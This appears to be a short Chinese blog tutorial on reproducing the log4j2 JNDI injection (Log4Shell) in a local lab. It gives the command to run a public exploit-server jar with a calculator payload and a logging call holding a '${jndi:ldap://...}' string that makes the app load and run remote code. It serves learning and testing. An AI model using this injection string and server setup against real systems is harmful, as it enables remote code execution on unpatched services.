概述
log4j2 漏洞复现
https://github.com/welk1n/JNDI-Injection-Exploit
1、运行该github项目(用idea运行ServerStart的main方法或运行jar包,jar包上面github地址有提供)
注意windows与mac的不同 ,jdk1.8及以下
运行jar包命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:WindowsSystem32calc.exe" -A "127.0.0.1"
若是通过idea运行注意替换命令
运行之后会生成url ,url示例:ldap://192.168.88.1:1389/k5vyxp
2、运行带log4j2的项目 log.error(url),运行成功后会打开你的计算器
System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”,“true”);
log.error("${jndi:ldap://192.168.88.1:1389/k5vyxp}")
最后
以上就是柔弱发带为你收集整理的2021-12-10 log4j2 漏洞复现的全部内容,希望文章能够帮你解决2021-12-10 log4j2 漏洞复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复